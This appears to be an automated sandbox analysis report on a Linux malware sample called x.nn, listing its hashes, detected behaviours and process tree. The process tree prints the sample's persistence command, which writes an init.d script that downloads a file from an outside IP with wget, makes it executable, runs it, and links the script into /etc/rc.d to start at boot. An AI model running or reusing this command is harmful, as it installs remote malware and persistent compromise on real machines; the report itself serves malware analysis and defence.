Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags
    arch:amd64
    arch:i386
    image:ubuntu2204-amd64-20240611-en
    kernel:5.15.0-105-generic
    locale:en-us
    os:ubuntu-22.04-amd64
    system
  • submitted
    08/09/2024, 18:29

General

  • Target

    x.nn

  • Size

    76KB

  • MD5

    973a64d7c0dfa2aa3fdeeed0b15b14bb

  • SHA1

    9533d5194a3d9c6ced530a2f300f0edfa5cccb69

  • SHA256

    15d168a0a401611890ff27e5cc69edde969d42defa25a82758d8401804bc04ec

  • SHA512

    028b138d464485de35094f3754ff6a3d917a50181cd28f1633fa5fb2bc672bcc739dfdd2cdccde1b7393c8caf3009bb58383775d591de8caea9f96c7caaa1079

  • SSDEEP

    1536:/l1h73pl93YNjnYhd0t++IXonF9dzeet7TxOrQy:tb0jnYhd7ovtD/mQy

Malware Config

Signatures

Processes

  • /tmp/x.nn
    /tmp/x.nn
    1⤵
    • Modifies Watchdog functionality
    • Modifies rc script
    • Changes its process name
    PID:1572
    • /bin/sh
      sh -c "echo \"#!/bin/sh # /etc/init.d/x.nn case \\\"\$1\\\" in start) echo 'Starting x.nn' /tmp/x.nn & wget http://45.202.35.35/lol -O /tmp/lol chmod +x /tmp/lol /tmp/lol & ;; stop) echo 'Stopping x.nn' killall x.nn ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/x.nn"
      2⤵
      • File and Directory Permissions Modification
      • Modifies init.d
      PID:1574
    • /bin/sh
      sh -c "chmod +x /etc/init.d/x.nn"
      2⤵
      • File and Directory Permissions Modification
      PID:1575
      • /usr/bin/chmod
        chmod +x /etc/init.d/x.nn
        3⤵
        • File and Directory Permissions Modification
        PID:1576
    • /bin/sh
      sh -c "mkdir -p /etc/rc.d"
      2⤵
      PID:1577
      • /usr/bin/mkdir
        mkdir -p /etc/rc.d
        3⤵
        • Reads runtime system information
        PID:1578
    • /bin/sh
      sh -c "ln -s /etc/init.d/x.nn /etc/rc.d/S99x.nn"
      2⤵
      PID:1579
      • /usr/bin/ln
        ln -s /etc/init.d/x.nn /etc/rc.d/S99x.nn
        3⤵
        PID:1580

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /etc/motd

    Filesize

    53B

    MD5

    2bd9b4be30579e633fc0191aa93df486

    SHA1

    7d63a9bd9662e86666b27c1b50db8e7370c624ff

    SHA256

    64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d

    SHA512

    ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5